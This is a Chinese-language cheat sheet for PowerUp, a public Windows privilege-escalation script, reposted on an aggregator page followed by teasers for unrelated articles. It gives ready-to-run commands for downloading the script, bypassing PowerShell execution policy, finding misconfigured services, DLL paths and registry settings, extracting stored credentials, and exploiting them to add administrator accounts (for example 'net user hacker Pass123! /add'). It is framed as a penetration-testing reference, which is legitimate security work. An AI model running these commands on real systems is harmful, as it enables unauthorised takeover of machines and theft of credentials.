提权脚本Powerup命令备忘单

news2025/5/17 13:57:36
1. 获取与加载
  • 从 GitHub 下载
    (New-Object Net.WebClient).DownloadFile("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1", "C:\Temp\PowerUp.ps1")
    
  • 本地加载
    Import-Module .\PowerUp.ps1
    
  • 绕过执行策略
    powershell.exe -ep Bypass -File PowerUp.ps1
    

2. 场景化使用
场景 1:快速全面扫描提权机会
  • 需求:快速了解目标系统所有潜在提权路径。
  • 命令
    Invoke-AllChecks
    
  • 用途:扫描所有漏洞向量(如服务、注册表、DLL 劫持等),输出详细结果及建议的滥用函数。
  • 扩展:生成 HTML 报告,便于分析:
    Invoke-AllChecks -HTMLReport
    
  • 适用场景:渗透测试初期,需全面摸底系统配置。
场景 2:检查服务相关提权
  • 需求:发现可利用的服务配置错误(如未加引号路径或可修改服务)。
  • 命令
    • 未加引号服务路径:
      Get-ServiceUnquoted
      
    • 可修改服务:
      Get-ModifiableService
      
    • 可写服务二进制路径:
      Get-ModifiableServiceFile
      
  • 用途:识别服务配置漏洞,常用于服务路径劫持或替换服务二进制。
  • 利用示例
    • 发现可修改服务后,添加管理员用户:
      Invoke-ServiceAbuse -Name "Vuln-Service" -Username "john" -Password "Password123!"
      
    • 利用未加引号路径:
      Write-ServiceBinary -Name "unquotedsvc" -Path "C:\Program Files\Unquoted Path Service\Common.exe" -Username "badmin" -Password "p4ssw0rd"
      
  • 适用场景:目标系统运行大量服务,需针对服务提权。
场景 3:查找 DLL 劫持机会
  • 需求:检查是否存在 DLL 劫持漏洞以提升权限。
  • 命令
    • 查找 DLL 劫持:
      Invoke-FindDLLHijack
      
    • PATH 环境变量劫持:
      Invoke-FindPathDLLHijack
      
  • 用途:识别缺失或可写 DLL 的加载路径,适合植入恶意 DLL。
  • 适用场景:目标系统运行自定义应用程序,可能存在 DLL 加载问题。
场景 4:检查注册表提权路径
  • 需求:发现注册表配置错误(如自动运行程序或 UAC 绕过)。
  • 命令
    • 自动运行程序:
      Get-RegistryAutoRun
      
    • AlwaysInstallElevated(UAC 绕过):
      Get-RegistryAlwaysInstallElevated
      
  • 利用示例
    • 利用 AlwaysInstallElevated:
      Write-UserAddMSI
      
  • 适用场景:目标系统配置了自动运行程序或启用了高权限安装策略。
场景 5:提取凭据与配置文件
  • 需求:从系统配置文件中获取敏感凭据。
  • 命令
    • Web 配置文件凭据:
      Get-Webconfig
      
    • Unattended.xml 凭据:
      Get-UnattendedInstallFile
      
  • 用途:提取未加密的凭据,获取管理员账户或服务账户信息。
  • 适用场景:目标系统为 Web 服务器或存在自动安装配置文件。
场景 6:检查令牌与权限
  • 需求:了解当前用户的权限或令牌状态,寻找特权提升机会。
  • 命令
    • 进程令牌权限:
      Get-ProcessTokenPrivilege
      
    • 用户 SID 组:
      Get-ProcessTokenGroup
      
  • 利用示例
    • 启用特权(如 SeDebugPrivilege):
      Enable-Privilege -Privilege "SeDebugPrivilege"
      
  • 适用场景:当前用户拥有潜在高权限令牌,需进一步利用。
场景 7:创建恶意服务提权
  • 需求:通过安装自定义服务执行高权限命令。
  • 命令
    Install-ServiceBinary -Name "EvilService" -Command "net user hacker Pass123! /add"
    
  • 用途:创建新服务以运行提权命令,适合无现成漏洞但有服务创建权限的场景。
  • 适用场景:目标系统允许低权限用户创建服务。

3. 输出与记录
  • 保存结果
    Invoke-AllChecks | Tee-Object -FilePath C:\Users\Public\report.txt
    
  • 生成 HTML 报告
    Invoke-AllChecks -HTMLReport
    
  • 用途:便于整理分析或提交测试报告。

4. 实用提示
  • 运行环境:Windows 系统,PowerShell 2.0+,低权限用户运行以发现提权路径。
  • 注意事项
    • 确认服务可重启(CanRestart: True)再利用。
    • 测试前评估命令影响,避免破坏系统。
    • 优先手动验证 Invoke-AllChecks 结果,避免直接运行自动提权。
  • 获取帮助
    Get-Help <Cmdlet-Name> -Full
    
    示例:Get-Help Get-ModifiableService -Full

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2377713.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

一个完整的项目示例:taro开发微信小程序

前一周完成了一个项目&#xff0c;体测成绩转换的工具&#xff0c;没做记录&#xff0c;。这次计划开发一个地图应用小程序&#xff0c;记录一下。方便给使用的人。 一、申请微信小程序&#xff0c;填写相应的信息&#xff0c;取得开发者ID。这个要给腾讯地图使用的。 二、申…

龙虎榜——20250516

上证缩量收阴线&#xff0c;小盘股表现相对更好&#xff0c;上涨的个股大于下跌的&#xff0c;日线已到前期压力位附近&#xff0c;注意风险。 深证缩量收假阳线&#xff0c;临近日线周期上涨末端&#xff0c;注意风险。 2025年5月16日龙虎榜行业方向分析 跨境电商&#xff…

Python----神经网络(《Inverted Residuals and Linear Bottlenecks》论文概括和MobileNetV2网络)

一、论文 MobileNetV2 论文提出了一种新的移动架构&#xff0c;该架构提高了移动模型在多个任务和基准测试中的性能&#xff0c;以及在各种不同模型大小范围内的性能. 该架构基于倒残差结构&#xff0c;其中 shortcut 连接在 thin bottleneck 层之间. 中间的 expansion 层使用轻…

React Flow 简介:构建交互式流程图的最佳工具

本文为《React Agent&#xff1a;从零开始构建 AI 智能体》专栏系列文章。 专栏地址&#xff1a;https://blog.csdn.net/suiyingy/category_12933485.html。项目地址&#xff1a;https://gitee.com/fgai/react-agent&#xff08;含完整代码示​例与实战源&#xff09;。完整介绍…

Jupyter-AI Pandas-AI本地使用功能优化

引言 Jupyter-ai 和 Pandas-ai 的优化主要是个人工作遇到的需求,个人觉得是一个不错的体验优化,所以进行分享仅供参考,不喜勿喷,共同进步!Jupyter-AI优化主要包含以下方向(当前已实现): Jupyter-AI中 Chat 扩展和 NoteBook 的 Cell 工作去部分,使用的Language Model 和 …

WEB安全--Java安全--shiro550反序列化漏洞

一、前言 什么是shiro&#xff1f; shiro是一个Apache的Java安全框架 它的作用是什么&#xff1f; Apache Shiro 是一个强大且灵活的 Java 安全框架&#xff0c;用于处理身份验证、授权、密码管理以及会话管理等功能 二、shiro550反序列化原理 1、用户首次登录并勾选记住密码…

【 Redis | 实战篇 秒杀实现 】

目录 前言&#xff1a; 1.全局ID生成器 2.秒杀优惠券 2.1.秒杀优惠券的基本实现 2.2.超卖问题 2.3.解决超卖问题的方案 2.4.基于乐观锁来解决超卖问题 3.秒杀一人一单 3.1.秒杀一人一单的基本实现 3.2.单机模式下的线程安全问题 3.3.集群模式下的线程安全问题 前言&…

数据通信原理 光纤通信 期末速成

一、图表题 1. 双极性不归零、单极性不归零、曼彻斯特码、抑制载频2ASK&#xff0c;2PSK、2DPSK信号的波形 双极性不归零 和 单极性不归零&#xff1a;不归零意思是 0 低 1 高 非归零编码&#xff08;NRZ&#xff09;&#xff1a;用不同电平表示二进制数字&#xff0c;常以…

华为云kubernetes容器相关组件及作用

Kubernetes组件按功能分为‌控制平面组件‌、‌工作节点组件‌及‌扩展插件‌&#xff0c;协同实现容器化应用的编排与管理。 ‌一、控制平面组件&#xff08;Control Plane&#xff09;‌ 1‌、kube-apiserver‌ ‌作用&#xff1a;提供集群API入口&#xff0c;处理所有REST请…

安全与智能的双向奔赴,安恒信息先行一步

人类文明发展的长河中&#xff0c;每一次技术变革都重新书写了安全的定义。 从蒸汽机的轰鸣到电力的普及&#xff0c;从互联网的诞生到人工智能的崛起&#xff0c;技术创新与变革从未停止对于安全的挑战。今天&#xff0c;我们又站在一个关键的历史节点&#xff1a;AI大模型的…

window 显示驱动开发-分页视频内存资源

与 Microsoft Windows 2000 显示驱动程序模型不同&#xff0c;Windows Vista 显示驱动程序模型允许创建比可用物理视频内存总量更多的视频内存资源&#xff0c;然后根据需要分页进出视频内存。 换句话说&#xff0c;并非所有视频内存资源都同时位于视频内存中。 GPU 的管道中可…

【笔记】记一次PyCharm的问题反馈

#工作记录 最近更新至 PyCharm 社区版的最新版本后&#xff0c;我遇到了多个影响使用体验的问题。令人感到不便的是&#xff0c;一些在旧版本中非常便捷的功能&#xff0c;在新版本中却变得操作复杂、不够直观。过去&#xff0c;我一直通过 PyCharm 内置的故障报告与反馈机制反…

uniapp中vue3和pinia安装依赖npm install失败

目录 一、问题描述 二、问题原因 三、问题解析及解决方案 一、问题描述 用uni-app开发小程序的时候&#xff0c;使用了vue3pinia,安装依赖的时候发现vue和pinia的版本问题&#xff0c;安装失败&#xff0c; npm ERR! code ERESOLVE npm ERR! ERESOLVE could not resolve np…

DBF Converter:高效转换DBF文件,满足多样化数据处理需求

DBF Converter 是一款功能强大的数据转换工具&#xff0c;专为需要将DBF文件转换为其他格式的用户设计。它支持将DBF文件转换为CSV、Excel、HTML、SQL等多种常见格式&#xff0c;满足用户在不同场景下的数据处理需求。无论是数据迁移、报表生成还是日常数据处理&#xff0c;DBF…

Jmeter 安装包与界面汉化

Jmeter 安装包&#xff1a; 通过网盘分享的文件&#xff1a;CSDN-apache-jmeter-5.5 链接: https://pan.baidu.com/s/17gK98NxS19oKmkdRhGepBA?pwd1234 提取码: 1234 Jmeter界面汉化&#xff1a;

【C++】 —— 笔试刷题day_29

一、排序子序列 题目解析 一个数组的连续子序列&#xff0c;如果这个子序列是非递增或者非递减的&#xff1b;这个连续的子序列就是排序子序列。 现在给定一个数组&#xff0c;然后然我们判断这个子序列可以划分成多少个排序子序列。 例如&#xff1a;1 2 3 2 2 1 可以划分成 …

MongoTemplate 基础使用帮助手册

前言 MongoDB 是一种流行的 NoSQL 数据库&#xff0c;适合存储大量的非结构化数据。MongoTemplate 是 Spring Data MongoDB 中的一个核心组件&#xff0c;它提供了一组丰富的 API 来与 MongoDB 进行交互。它封装了许多常见的数据库操作&#xff0c;使开发者能够轻松执行 CRUD 操…

图像处理:预览并绘制图像细节

前言 因为最近在搞毕业论文的事情&#xff0c;要做出一下图像细节对比图&#xff0c;所以我这里写了两个脚本&#xff0c;一个用于框选并同时预览图像放大细节&#xff0c;可显示并返回框选图像的坐标&#xff0c;另外一个是输入框选图像的坐标并将放大的细节放置在图像中&…

力扣热题——最长相邻不相等子序列 |

题目要求从字符串数组 words 中选出一个最长的子序列&#xff0c;使得该子序列中相邻字符串对应的 groups 数组中的值不同。通过贪心算法&#xff0c;可以高效地解决该问题。具体步骤为&#xff1a;初始化一个结果列表&#xff0c;遍历 words 数组&#xff0c;检查当前字符串的…

ssti刷刷刷

[NewStarCTF 公开赛赛道]BabySSTI_One 测试发现过滤关键字&#xff0c;但是特殊符号中括号、双引号、点都能用 可以考虑拼接或者编码&#xff0c;这里使用拼接 ?name{{()["__cla"~"ss__"]}}?name{{()["__cla"~"ss__"]["__ba&…